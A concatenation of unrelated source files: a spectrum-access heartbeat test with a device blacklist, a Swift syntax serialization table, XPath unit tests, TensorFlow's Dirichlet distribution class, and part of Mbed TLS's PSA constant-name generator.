self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertTrue(resp['grantId'])
self.assertEqual(resp['response']['responseCode'], 0)
grant_expire_time.append(
datetime.strptime(resp['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ'))
grant_ids = [resp['grantId'] for resp in response]
del request, response
# Inject Third Device into Blacklist
self._sas_admin.BlacklistByFccId({'fccId': fcc_ids[2]})
# First Heartbeat Request
heartbeat_request = []
for cbsd_id, grant_id in zip(cbsd_ids, grant_ids):
heartbeat_request.append({
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
})
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
self.assertEqual(len(response), len(grant_ids))
# Check the heartbeat response
# First two devices are not in Blacklist must have Response Code 0
for index, resp in enumerate(response[:2]):
self.assertEqual(resp['cbsdId'], cbsd_ids[index])
self.assertEqual(resp['grantId'], grant_ids[index])
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time,
grant_expire_time[index])
self.assertEqual(resp['response']['responseCode'], 0)
# Last Device in Blacklist must have Response Code 105
self.assertEqual(response[2]['cbsdId'], cbsd_ids[2])
self.assertEqual(response[2]['grantId'], grant_ids[2])
self.assertTrue('transmitExpireTime' in response[2])
self.assertEqual(response[2]['response']['responseCode'], 105)
|
|
from .Node import error
SYNTAX_NODE_SERIALIZATION_CODES = {
# 0 is 'Token'. Needs to be defined manually
# 1 is 'Unknown'. Needs to be defined manually
'UnknownDecl': 2,
'TypealiasDecl': 3,
'AssociatedtypeDecl': 4,
'IfConfigDecl': 5,
'PoundErrorDecl': 6,
'PoundWarningDecl': 7,
'PoundSourceLocation': 8,
'ClassDecl': 9,
'StructDecl': 10,
'ProtocolDecl': 11,
'ExtensionDecl': 12,
'FunctionDecl': 13,
'InitializerDecl': 14,
'DeinitializerDecl': 15,
'SubscriptDecl': 16,
'ImportDecl': 17,
'AccessorDecl': 18,
'VariableDecl': 19,
'EnumCaseDecl': 20,
'EnumDecl': 21,
'OperatorDecl': 22,
'PrecedenceGroupDecl': 23,
'UnknownExpr': 24,
'InOutExpr': 25,
'PoundColumnExpr': 26,
'TryExpr': 27,
'AwaitExpr': 249,
'IdentifierExpr': 28,
'SuperRefExpr': 29,
'NilLiteralExpr': 30,
'DiscardAssignmentExpr': 31,
'AssignmentExpr': 32,
'SequenceExpr': 33,
'PoundLineExpr': 34,
'PoundFileExpr': 35,
'PoundFunctionExpr': 36,
'PoundDsohandleExpr': 37,
'SymbolicReferenceExpr': 38,
'PrefixOperatorExpr': 39,
'BinaryOperatorExpr': 40,
'ArrowExpr': 41,
'FloatLiteralExpr': 42,
'TupleExpr': 43,
'ArrayExpr': 44,
'DictionaryExpr': 45,
'ImplicitMemberExpr': 46,
'IntegerLiteralExpr': 47,
'StringLiteralExpr': 48,
'BooleanLiteralExpr': 49,
'TernaryExpr': 50,
'MemberAccessExpr': 51,
'DotSelfExpr': 52,
'IsExpr': 53,
'AsExpr': 54,
'TypeExpr': 55,
'ClosureExpr': 56,
'UnresolvedPatternExpr': 57,
'FunctionCallExpr': 58,
'SubscriptExpr': 59,
'OptionalChainingExpr': 60,
'ForcedValueExpr': 61,
'PostfixUnaryExpr': 62,
'SpecializeExpr': 63,
'KeyPathExpr': 65,
'KeyPathBaseExpr': 66,
'ObjcKeyPathExpr': 67,
'ObjcSelectorExpr': 68,
'EditorPlaceholderExpr': 69,
'ObjectLiteralExpr': 70,
'UnknownStmt': 71,
'ContinueStmt': 72,
'WhileStmt': 73,
'DeferStmt': 74,
'ExpressionStmt': 75,
'RepeatWhileStmt': 76,
'GuardStmt': 77,
'ForInStmt': 78,
'SwitchStmt': 79,
'DoStmt': 80,
'ReturnStmt': 81,
'FallthroughStmt': 82,
'BreakStmt': 83,
'DeclarationStmt': 84,
'ThrowStmt': 85,
'IfStmt': 86,
'Decl': 87,
'Expr': 88,
'Stmt': 89,
'Type': 90,
'Pattern': 91,
'CodeBlockItem': 92,
'CodeBlock': 93,
'DeclNameArgument': 94,
'DeclNameArguments': 95,
# removed: 'FunctionCallArgument': 96,
'TupleExprElement': 97,
'ArrayElement': 98,
'DictionaryElement': 99,
'ClosureCaptureItem': 100,
'ClosureCaptureSignature': 101,
'ClosureParam': 102,
'ClosureSignature': 103,
'StringSegment': 104,
'ExpressionSegment': 105,
'ObjcNamePiece': 106,
'TypeInitializerClause': 107,
'ParameterClause': 108,
'ReturnClause': 109,
'FunctionSignature': 110,
'IfConfigClause': 111,
'PoundSourceLocationArgs': 112,
'DeclModifier': 113,
'InheritedType': 114,
'TypeInheritanceClause': 115,
'MemberDeclBlock': 116,
'MemberDeclListItem': 117,
'SourceFile': 118,
'InitializerClause': 119,
'FunctionParameter': 120,
'AccessLevelModifier': 121,
'AccessPathComponent': 122,
'AccessorParameter': 123,
'AccessorBlock': 124,
'PatternBinding': 125,
'EnumCaseElement': 126,
'OperatorPrecedenceAndTypes': 127,
'PrecedenceGroupRelation': 128,
'PrecedenceGroupNameElement': 129,
'PrecedenceGroupAssignment': 130,
'PrecedenceGroupAssociativity': 131,
'Attribute': 132,
'LabeledSpecializeEntry': 133,
'ImplementsAttributeArguments': 134,
'ObjCSelectorPiece': 135,
'WhereClause': 136,
'ConditionElement': 137,
'AvailabilityCondition': 138,
'MatchingPatternCondition': 139,
'OptionalBindingCondition': 140,
'ElseIfContinuation': 141,
'ElseBlock': 142,
'SwitchCase': 143,
'SwitchDefaultLabel': 144,
'CaseItem': 145,
'SwitchCaseLabel': 146,
'CatchClause': 147,
'GenericWhereClause': 148,
'SameTypeRequirement': 149,
'GenericParameter': 150,
'GenericParameterClause': 151,
'ConformanceRequirement': 152,
'CompositionTypeElement': 153,
'TupleTypeElement': 154,
'GenericArgument': 155,
'GenericArgumentClause': 156,
'TypeAnnotation': 157,
'TuplePatternElement': 158,
'AvailabilityArgument': 159,
'AvailabilityLabeledArgument': 160,
'AvailabilityVersionRestriction': 161,
'VersionTuple': 162,
'CodeBlockItemList': 163,
# removed: 'FunctionCallArgumentList': 164,
'TupleExprElementList': 165,
'ArrayElementList': 166,
'DictionaryElementList': 167,
'StringLiteralSegments': 168,
'DeclNameArgumentList': 169,
'ExprList': 170,
'ClosureCaptureItemList': 171,
'ClosureParamList': 172,
'ObjcName': 173,
'FunctionParameterList': 174,
'IfConfigClauseList': 175,
'InheritedTypeList': 176,
'MemberDeclList': 177,
'ModifierList': 178,
'AccessPath': 179,
'AccessorList': 180,
'PatternBindingList': 181,
'EnumCaseElementList': 182,
'PrecedenceGroupAttributeList': 183,
'PrecedenceGroupNameList': 184,
'TokenList': 185,
'NonEmptyTokenList': 186,
'AttributeList': 187,
'SpecializeAttributeSpecList': 188,
'ObjCSelector': 189,
'SwitchCaseList': 190,
'CatchClauseList': 191,
'CaseItemList': 192,
'ConditionElementList': 193,
'GenericRequirementList': 194,
'GenericParameterList': 195,
'CompositionTypeElementList': 196,
'TupleTypeElementList': 197,
'GenericArgumentList': 198,
'TuplePatternElementList': 199,
'AvailabilitySpecList': 200,
'UnknownPattern': 201,
'EnumCasePattern': 202,
'IsTypePattern': 203,
'OptionalPattern': 204,
'IdentifierPattern': 205,
'AsTypePattern': 206,
'TuplePattern': 207,
'WildcardPattern': 208,
'ExpressionPattern': 209,
'ValueBindingPattern': 210,
'UnknownType': 211,
'SimpleTypeIdentifier': 212,
'MemberTypeIdentifier': 213,
'ClassRestrictionType': 214,
'ArrayType': 215,
'DictionaryType': 216,
'MetatypeType': 217,
'OptionalType': 218,
'ImplicitlyUnwrappedOptionalType': 219,
'CompositionType': 220,
'TupleType': 221,
'FunctionType': 222,
'AttributedType': 223,
'YieldStmt': 224,
'YieldList': 225,
'IdentifierList': 226,
'NamedAttributeStringArgument': 227,
'DeclName': 228,
'PoundAssertStmt': 229,
'SomeType': 230,
'CustomAttribute': 231,
'GenericRequirement': 232,
'DifferentiableAttributeArguments': 233,
'DifferentiabilityParamsClause': 234,
'DifferentiabilityParams': 235,
'DifferentiabilityParamList': 236,
'DifferentiabilityParam': 237,
# removed: 'DifferentiableAttributeFuncSpecifier': 238,
'FunctionDeclName': 239,
'PoundFilePathExpr': 240,
'DerivativeRegistrationAttributeArguments': 241,
'QualifiedDeclName': 242,
'CatchItem': 243,
'CatchItemList': 244,
'MultipleTrailingClosureElementList': 245,
'MultipleTrailingClosureElement': 246,
'PoundFileIDExpr': 247,
'TargetFunctionEntry': 248,
}
def verify_syntax_node_serialization_codes(nodes, serialization_codes):
# Verify that all nodes have serialization codes
for node in nodes:
if not node.is_base() and node.syntax_kind not in serialization_codes:
error('Node %s has no serialization code' % node.syntax_kind)
# Verify that no serialization code is used twice
used_codes = set()
for serialization_code in serialization_codes.values():
if serialization_code in used_codes:
error("Serialization code %d used twice" % serialization_code)
used_codes.add(serialization_code)
def get_serialization_code(syntax_kind):
return SYNTAX_NODE_SERIALIZATION_CODES[syntax_kind]
|
|
#!/usr/bin/env python
import unittest
import xml.dom.minidom
from dominic import xpath
class TestAbbreviations(unittest.TestCase):
"""Section 2.5: Abbreviated Syntax"""
def test_para_children(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" />
<div id="2" />
<para id="3" />
</doc>
""").documentElement
result = xpath.find('para', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1", "3"])
def test_all_children(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" />
<div id="2" />
<para id="3" />
</doc>
""").documentElement
result = xpath.find('*', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1", "2", "3"])
def test_text_children(self):
doc = xml.dom.minidom.parseString("""
<doc>This is <i>some</i> text.</doc>
""").documentElement
result = xpath.find('text()', doc)
self.failUnlessEqual([x.data for x in result],
["This is ", " text."])
def test_named_attribute(self):
doc = xml.dom.minidom.parseString("""
<doc name="foo" value="bar" />
""").documentElement
result = xpath.find('@name', doc)
self.failUnlessEqual([(x.name, x.value) for x in result],
[('name', 'foo')])
def test_all_attributes(self):
doc = xml.dom.minidom.parseString("""
<doc name="foo" value="bar" />
""").documentElement
result = xpath.find('@*', doc)
self.failUnlessEqual([(x.name, x.value) for x in result],
[('name', 'foo'), ('value', 'bar')])
def test_first_child(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" /><para id="2" /><para id="3" />
</doc>
""").documentElement
result = xpath.find('para[1]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1"])
def test_last_child(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" /><para id="2" /><para id="3" />
</doc>
""").documentElement
result = xpath.find('para[last()]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["3"])
def test_grandchildren(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter><para id="1" /><para id="2" /></chapter>
<section><para id="3" /><sub><para id="4" /></sub></section>
<para id="4" />
</doc>
""").documentElement
result = xpath.find('*/para', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1", "2", "3"])
def test_section_5_2(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter id="1" /><chapter id="2" /><chapter id="3" />
<chapter id="4">
<section id="4.1" /><section id="4.2" /><section id="4.3" />
</chapter>
<chapter id="5">
<section id="5.1" /><section id="5.2" /><section id="5.3" />
</chapter>
</doc>
""").documentElement
result = xpath.find('/doc/chapter[5]/section[2]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["5.2"])
def test_child_descendant(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter><para id="1" /><para id="2" /></chapter>
<chapter><section><para id="3" /></section></chapter>
<para id="4" />
</doc>
""").documentElement
result = xpath.find('chapter//para', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1", "2", "3"])
def test_absolute_descendant_or_self(self):
doc = xml.dom.minidom.parseString("""
<para id="0">
<div id="1" />
<para id="2">
<para id="3" />
</para>
</para>
""").documentElement
node = xpath.findnode('//para[@id="2"]', doc)
result = xpath.find('//para', node)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["0", "2", "3"])
def test_olist_item(self):
doc = xml.dom.minidom.parseString("""
<doc>
<item id="1">
<context />
<olist><item id="2" /></olist>
</item>
<olist><item id="3" /></olist>
</doc>
""").documentElement
node = xpath.findnode('//context', doc)
result = xpath.find('//olist/item', node)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["2", "3"])
def test_self(self):
doc = xml.dom.minidom.parseString("""
<doc id="0">
<para id="1"/>
</doc>
""").documentElement
result = xpath.find('.', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["0"])
def test_relative_descendant_or_self(self):
doc = xml.dom.minidom.parseString("""
<para id="0">
<div id="1" />
<para id="2">
<para id="3" />
</para>
</para>
""").documentElement
node = xpath.findnode('//para[@id="2"]', doc)
result = xpath.find('.//para', node)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["3"])
def test_parent(self):
doc = xml.dom.minidom.parseString("""
<doc id="0">
<chapter id="1">
<item id="2" />
<item id="3"><subitem id="4" /></item>
</chapter>
</doc>
""").documentElement
node = xpath.findnode('//item[@id="3"]', doc)
result = xpath.find('..', node)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["1"])
def test_parent_attr(self):
doc = xml.dom.minidom.parseString("""
<doc id="0">
<chapter id="1" lang="en">
<item id="2" />
<item id="3"><subitem id="4" /></item>
</chapter>
</doc>
""").documentElement
node = xpath.findnode('//item[@id="3"]', doc)
result = xpath.find('../@lang', node)
self.failUnlessEqual([x.value for x in result],
["en"])
def test_attr_equal(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" type="info" />
<para id="2" type="warning" />
<para id="3" type="warning" />
<para id="4" type="error" />
</doc>
""").documentElement
result = xpath.find('para[@type="warning"]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["2", "3"])
def test_fifth_warning(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" type="info" />
<para id="2" type="warning" />
<para id="3" type="warning" />
<para id="4" type="warning" />
<para id="5" type="error" />
<para id="6" type="warning" />
<para id="7" type="warning" />
</doc>
""").documentElement
result = xpath.find(
'para[@type="warning"][5]', doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["7"])
def test_fifth_if_warning(self):
doc = xml.dom.minidom.parseString("""
<doc>
<para id="1" type="info" />
<para id="2" type="warning" />
<para id="3" type="warning" />
<para id="4" type="warning" />
<para id="5" type="error" />
<para id="6" type="warning" />
<para id="7" type="warning" />
</doc>
""").documentElement
result = xpath.find(
'para[5][@type="warning"]', doc)
self.failUnlessEqual(result, [])
def test_introductions(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter id="1" />
<chapter id="2"><title>Introduction</title></chapter>
<chapter id="3"><title>Body</title></chapter>
<chapter id="4">
<title>Another</title>
<title>Introduction</title>
</chapter>
</doc>
""").documentElement
result = xpath.find("chapter[title='Introduction']", doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["2", "4"])
def test_titles(self):
doc = xml.dom.minidom.parseString("""
<doc>
<chapter id="1" />
<chapter id="2"><title /></chapter>
<chapter id="3"><title /><title /></chapter>
</doc>
""").documentElement
result = xpath.find("chapter[title]", doc)
self.failUnlessEqual([x.getAttribute("id") for x in result],
["2", "3"])
def test_secretary_and_assistant(self):
doc = xml.dom.minidom.parseString("""
<doc>
<employee name="Alice" />
<employee name="Bob" secretary="Cathy" />
<employee name="Dianne" secretary="Edward" assistant="Fran" />
</doc>
""").documentElement
result = xpath.find("employee[@secretary and @assistant]", doc)
self.failUnlessEqual([x.getAttribute("name") for x in result],
["Dianne"])
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Dirichlet distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import util as distribution_util
__all__ = [
"Dirichlet",
]
_dirichlet_sample_note = """Note: `value` must be a non-negative tensor with
dtype `self.dtype` and be in the `(self.event_shape() - 1)`-simplex, i.e.,
`tf.reduce_sum(value, -1) = 1`. It must have a shape compatible with
`self.batch_shape() + self.event_shape()`."""
class Dirichlet(distribution.Distribution):
"""Dirichlet distribution.
The Dirichlet distribution is defined over the
[`(k-1)`-simplex](https://en.wikipedia.org/wiki/Simplex) using a positive,
length-`k` vector `concentration` (`k > 1`). The Dirichlet is identically the
Beta distribution when `k = 2`.
#### Mathematical Details
The Dirichlet is a distribution over the open `(k-1)`-simplex, i.e.,
```none
S^{k-1} = { (x_0, ..., x_{k-1}) in R^k : sum_j x_j = 1 and all_j x_j > 0 }.
```
The probability density function (pdf) is,
```none
pdf(x; alpha) = prod_j x_j**(alpha_j - 1) / Z
Z = prod_j Gamma(alpha_j) / Gamma(sum_j alpha_j)
```
where:
* `x in S^{k-1}`, i.e., the `(k-1)`-simplex,
* `concentration = alpha = [alpha_0, ..., alpha_{k-1}]`, `alpha_j > 0`,
* `Z` is the normalization constant aka the [multivariate beta function](
https://en.wikipedia.org/wiki/Beta_function#Multivariate_beta_function),
and,
* `Gamma` is the [gamma function](
https://en.wikipedia.org/wiki/Gamma_function).
The `concentration` represents mean total counts of class occurrence, i.e.,
```none
concentration = alpha = mean * total_concentration
```
where `mean` in `S^{k-1}` and `total_concentration` is a positive real number
representing a mean total count.
Distribution parameters are automatically broadcast in all functions; see
examples for details.
#### Examples
```python
# Create a single trivariate Dirichlet, with the 3rd class being three times
# more frequent than the first. I.e., batch_shape=[], event_shape=[3].
alpha = [1., 2, 3]
dist = Dirichlet(alpha)
dist.sample([4, 5]) # shape: [4, 5, 3]
# x has one sample, one batch, three classes:
x = [.2, .3, .5] # shape: [3]
dist.prob(x) # shape: []
# x has two samples from one batch:
x = [[.1, .4, .5],
[.2, .3, .5]]
dist.prob(x) # shape: [2]
# alpha will be broadcast to shape [5, 7, 3] to match x.
x = [[...]] # shape: [5, 7, 3]
dist.prob(x) # shape: [5, 7]
```
```python
# Create batch_shape=[2], event_shape=[3]:
alpha = [[1., 2, 3],
[4, 5, 6]] # shape: [2, 3]
dist = Dirichlet(alpha)
dist.sample([4, 5]) # shape: [4, 5, 2, 3]
x = [.2, .3, .5]
# x will be broadcast as [[.2, .3, .5],
# [.2, .3, .5]],
# thus matching batch_shape [2, 3].
dist.prob(x) # shape: [2]
```
"""
def __init__(self,
concentration,
validate_args=False,
allow_nan_stats=True,
name="Dirichlet"):
"""Initialize a batch of Dirichlet distributions.
Args:
concentration: Positive floating-point `Tensor` indicating mean number
of class occurrences; aka "alpha". Implies `self.dtype`, and
`self.batch_shape`, `self.event_shape`, i.e., if
`concentration.shape = [N1, N2, ..., Nm, k]` then
`batch_shape = [N1, N2, ..., Nm]` and
`event_shape = [k]`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = locals()
with ops.name_scope(name, values=[concentration]):
self._concentration = self._maybe_assert_valid_concentration(
ops.convert_to_tensor(concentration, name="concentration"),
validate_args)
self._total_concentration = math_ops.reduce_sum(self._concentration, -1)
super(Dirichlet, self).__init__(
dtype=self._concentration.dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
parameters=parameters,
graph_parents=[self._concentration,
self._total_concentration],
name=name)
@property
def concentration(self):
"""Concentration parameter; expected counts for that coordinate."""
return self._concentration
@property
def total_concentration(self):
"""Sum of last dim of concentration parameter."""
return self._total_concentration
def _batch_shape_tensor(self):
return array_ops.shape(self.total_concentration)
def _batch_shape(self):
return self.total_concentration.get_shape()
def _event_shape_tensor(self):
return array_ops.shape(self.concentration)[-1:]
def _event_shape(self):
return self.concentration.get_shape().with_rank_at_least(1)[-1:]
def _sample_n(self, n, seed=None):
gamma_sample = random_ops.random_gamma(
shape=[n],
alpha=self.concentration,
dtype=self.dtype,
seed=seed)
return gamma_sample / math_ops.reduce_sum(gamma_sample, -1, keep_dims=True)
@distribution_util.AppendDocstring(_dirichlet_sample_note)
def _log_prob(self, x):
return self._log_unnormalized_prob(x) - self._log_normalization()
@distribution_util.AppendDocstring(_dirichlet_sample_note)
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _log_unnormalized_prob(self, x):
x = self._maybe_assert_valid_sample(x)
return math_ops.reduce_sum((self.concentration - 1.) * math_ops.log(x), -1)
def _log_normalization(self):
return special_math_ops.lbeta(self.concentration)
def _entropy(self):
k = math_ops.cast(self.event_shape_tensor()[0], self.dtype)
return (
self._log_normalization()
+ ((self.total_concentration - k)
* math_ops.digamma(self.total_concentration))
- math_ops.reduce_sum(
(self.concentration - 1.) * math_ops.digamma(self.concentration),
axis=-1))
def _mean(self):
return self.concentration / self.total_concentration[..., array_ops.newaxis]
def _covariance(self):
x = self._variance_scale_term() * self._mean()
return array_ops.matrix_set_diag(
-math_ops.matmul(x[..., array_ops.newaxis],
x[..., array_ops.newaxis, :]), # outer prod
self._variance())
def _variance(self):
scale = self._variance_scale_term()
x = scale * self._mean()
return x * (scale - x)
def _variance_scale_term(self):
"""Helper to `_covariance` and `_variance` which computes a shared scale."""
return math_ops.rsqrt(1. + self.total_concentration[..., array_ops.newaxis])
@distribution_util.AppendDocstring(
"""Note: The mode is undefined when any `concentration <= 1`. If
`self.allow_nan_stats` is `True`, `NaN` is used for undefined modes. If
`self.allow_nan_stats` is `False` an exception is raised when one or more
modes are undefined.""")
def _mode(self):
k = math_ops.cast(self.event_shape_tensor()[0], self.dtype)
mode = (self.concentration - 1.) / (
self.total_concentration[..., array_ops.newaxis] - k)
if self.allow_nan_stats:
nan = array_ops.fill(
array_ops.shape(mode),
np.array(np.nan, dtype=self.dtype.as_numpy_dtype()),
name="nan")
return array_ops.where(
math_ops.reduce_all(self.concentration > 1., axis=-1),
mode, nan)
return control_flow_ops.with_dependencies([
check_ops.assert_less(
array_ops.ones([], self.dtype),
self.concentration,
message="Mode undefined when any concentration <= 1"),
], mode)
def _maybe_assert_valid_concentration(self, concentration, validate_args):
"""Checks the validity of the concentration parameter."""
if not validate_args:
return concentration
return control_flow_ops.with_dependencies([
check_ops.assert_positive(
concentration,
message="Concentration parameter must be positive."),
check_ops.assert_rank_at_least(
concentration, 1,
message="Concentration parameter must have >=1 dimensions."),
check_ops.assert_less(
1, array_ops.shape(concentration)[-1],
message="Concentration parameter must have event_size >= 2."),
], concentration)
def _maybe_assert_valid_sample(self, x):
"""Checks the validity of a sample."""
if not self.validate_args:
return x
return control_flow_ops.with_dependencies([
check_ops.assert_positive(
x,
message="samples must be positive"),
distribution_util.assert_close(
array_ops.ones([], dtype=self.dtype),
math_ops.reduce_sum(x, -1),
message="sample last-dimension must sum to `1`"),
], x)
|
|
#!/usr/bin/env python3
"""Generate psa_constant_names_generated.c
which is included by programs/psa/psa_constant_names.c.
The code generated by this module is only meant to be used in the context
of that program.
An argument passed to this script will modify the output directory where the
file is written:
* by default (no arguments passed): writes to programs/psa/
* OUTPUT_FILE_DIR passed: writes to OUTPUT_FILE_DIR/
"""
# Copyright The Mbed TLS Contributors
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
OUTPUT_TEMPLATE = '''\
/* Automatically generated by generate_psa_constant.py. DO NOT EDIT. */
static const char *psa_strerror(psa_status_t status)
{
switch (status) {
%(status_cases)s
default: return NULL;
}
}
static const char *psa_ecc_family_name(psa_ecc_family_t curve)
{
switch (curve) {
%(ecc_curve_cases)s
default: return NULL;
}
}
static const char *psa_dh_family_name(psa_dh_family_t group)
{
switch (group) {
%(dh_group_cases)s
default: return NULL;
}
}
static const char *psa_hash_algorithm_name(psa_algorithm_t hash_alg)
{
switch (hash_alg) {
%(hash_algorithm_cases)s
default: return NULL;
}
}
static const char *psa_ka_algorithm_name(psa_algorithm_t ka_alg)
{
switch (ka_alg) {
%(ka_algorithm_cases)s
default: return NULL;
}
}
static int psa_snprint_key_type(char *buffer, size_t buffer_size,
psa_key_type_t type)
{
size_t required_size = 0;
switch (type) {
%(key_type_cases)s
default:
%(key_type_code)s{
return snprintf(buffer, buffer_size,
"0x%%04x", (unsigned) type);
}
break;
}
buffer[0] = 0;
return (int) required_size;
}
#define NO_LENGTH_MODIFIER 0xfffffffflu
static int psa_snprint_algorithm(char *buffer, size_t buffer_size,
psa_algorithm_t alg)
{
size_t required_size = 0;
psa_algorithm_t core_alg = alg;
unsigned long length_modifier = NO_LENGTH_MODIFIER;
if (PSA_ALG_IS_MAC(alg)) {
core_alg = PSA_ALG_TRUNCATED_MAC(alg, 0);
if (core_alg != alg) {
append(&buffer, buffer_size, &required_size,
"PSA_ALG_TRUNCATED_MAC(", 22);
length_modifier = PSA_MAC_TRUNCATED_LENGTH(alg);
}
} else if (PSA_ALG_IS_AEAD(alg)) {
core_alg = PSA_ALG_AEAD_WITH_DEFAULT_TAG_LENGTH(alg);
if (core_alg == 0) {
/* For unknown AEAD algorithms, there is no "default tag length". */
core_alg = alg;
} else if (core_alg != alg) {
append(&buffer, buffer_size, &required_size,
"PSA_ALG_AEAD_WITH_TAG_LENGTH(", 29);
length_modifier = PSA_AEAD_TAG_LENGTH(alg);
}
} else if (PSA_ALG_IS_KEY_AGREEMENT(alg) &&
!PSA_ALG_IS_RAW_KEY_AGREEMENT(alg)) {
core_alg = PSA_ALG_KEY_AGREEMENT_GET_KDF(alg);
append(&buffer, buffer_size, &required_size,
"PSA_ALG_KEY_AGREEMENT(", 22);
append_with_alg(&buffer, buffer_size, &required_size,
psa_ka_algorithm_name,
PSA_ALG_KEY_AGREEMENT_GET_BASE(alg));
append(&buffer, buffer_size, &required_size, ", ", 2);
}
switch (core_alg) {
%(algorithm_cases)s
default:
%(algorithm_code)s{
append_integer(&buffer, buffer_size, &required_size,
"0x%%08lx", (unsigned long) core_alg);
}
break;
}
if (core_alg != alg) {
if (length_modifier != NO_LENGTH_MODIFIER) {
append(&buffer, buffer_size, &required_size, ", ", 2);
append_integer(&buffer, buffer_size, &required_size,
"%%lu", length_modifier);
}
append(&buffer, buffer_size, &required_size, ")", 1);
}
buffer[0] = 0;
return (int) required_size;
}
static int psa_snprint_key_usage(char *buffer, size_t buffer_size,
psa_key_usage_t usage)
{
size_t required_size = 0;
if (usage == 0) {
if (buffer_size > 1) {
buffer[0] = '0';
buffer[1] = 0;
} else if (buffer_size == 1) {
buffer[0] = 0;
}
return 1;
}
%(key_usage_code)s
if (usage != 0) {
if (required_size != 0) {
append(&buffer, buffer_size, &required_size, " | ", 3);
}
append_integer(&buffer, buffer_size, &required_size,
"0x%%08lx", (unsigned long) usage);
} else {
buffer[0] = 0;
}
return (int) required_size;
}
/* End of automatically generated file. */
'''
KEY_TYPE_FROM_CURVE_TEMPLATE = '''if (%(tester)s(type)) {
append_with_curve(&buffer, buffer_size, &required_size,
"%(builder)s", %(builder_length)s,
PSA_KEY_TYPE_ECC_GET_FAMILY(type));
} else '''
KEY_TYPE_FROM_GROUP_TEMPLATE = '''if (%(tester)s(type)) {
append_with_group(&buffer, buffer_size, &required_size,
"%(builder)s", %(builder_length)s,
PSA_KEY_TYPE_DH_GET_FAMILY(type));
} else '''
ALGORITHM_FROM_HASH_TEMPLATE = '''if (%(tester)s(core_alg)) {
append(&buffer, buffer_size, &required_size,
"%(builder)s(", %(builder_length)s + 1);
append_with_alg(&buffer, buffer_size, &required_size,
psa_hash_algorithm_name,
PSA_ALG_GET_HASH(core_alg));
append(&buffer, buffer_size, &required_size, ")", 1);
} else '''
BIT_TEST_TEMPLATE = '''\
if (%(var)s & %(flag)s) {
if (required_size != 0) {
append(&buffer, buffer_size, &required_size, " | ", 3);
}
append(&buffer, buffer_size, &required_size, "%(flag)s", %(length)d);
%(var)s ^= %(flag)s;
}\
'''
class MacroCollector:
"""Collect PSA crypto macro definitions from C header files.
1. Call `read_file` on the input header file(s).
2. Call `write_file` to write ``psa_constant_names_generated.c``.
"""
def __init__(self):
self.statuses = set()
self.key_types = set()
self.key_types_from_curve = {}
self.key_types_from_group = {}
self.ecc_curves = set()
self.dh_groups = set()
self.algorithms = set()
self.hash_algorithms = set()
self.ka_algorithms = set()
self.algorithms_from_hash = {}
self.key_usages = set()
